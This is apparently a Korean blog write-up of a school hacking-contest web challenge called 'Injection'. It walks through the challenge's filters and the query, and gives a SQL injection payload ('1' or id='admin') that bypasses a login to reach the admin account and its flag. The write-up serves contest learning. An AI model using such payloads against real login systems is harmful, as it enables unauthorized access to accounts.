본문 바로가기

교내해킹대회/Web

Injection

메인화면
소스코드

'user', '.', '()', '_' 필터링은 SQLMAP툴이나 문제 풀이에 상관없는 데이터 베이스 공격을 막아놓은 거고

별다른 필터링은 없다

admin으로 접속하면 됨

 

userpw = request.args.get('pw', ' ').lower()

pw만 get방식으로 파라미터를 받고 소문자로 만든다

 

select id from user where id='guest' and pw=' '

해당 쿼리로 admin를 추출

select id from user where id='guest' and pw='1' or id='admin'

id는 guest이고 pw는 1 이거나 id가 admin인 row 추출

 

'

FLAG get

'교내해킹대회 > Web' 카테고리의 다른 글

Secret File  (0) 2020.05.14
투명망토  (0) 2020.05.14
Escape-Room  (0) 2020.05.10
Captcha Challenge  (0) 2020.05.09
blind_sqli  (0) 2020.05.02